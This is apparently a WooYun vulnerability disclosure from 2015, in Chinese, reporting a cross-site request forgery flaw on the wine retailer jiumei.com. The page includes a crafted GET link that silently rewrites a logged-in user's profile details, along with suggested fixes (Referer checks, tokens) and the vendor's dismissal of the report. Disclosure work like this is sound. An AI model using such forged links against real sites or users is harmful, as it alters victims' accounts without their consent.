当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127940

漏洞标题:酒美网存在csrf漏洞

相关厂商:酒美网

漏洞作者: 路人甲

提交时间:2015-07-21 11:24

修复时间:2015-07-26 11:26

公开时间:2015-07-26 11:26

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

修改用户基本资料,抓包:

资料1.jpg

修改成功:

资料2.jpg

伪造恶意链接,可以看到修改用户资料的请求为get请求,故浏览器可直接访问该链接(此url地址由上面修改资料的请求得来):

http://www.jiumei.com/account/user_updateUser.dhtml?m=&name=%25u6211%25u6211%25u6211&homeAddress=%25u5317%25u4EAC%25u4E1C%25u57CE%25u533A&email=test_cumt%40126.com&sex=1&provincial=001002&city=001002001&county=null&zipcode=111111&mobile=13611111111&homePhone=5632365

资料3.jpg

刷新个人资料

资料4.jpg

验证已被成功修改

漏洞证明:

已证明

修复方案:

验证referer
加token

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-26 11:26

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无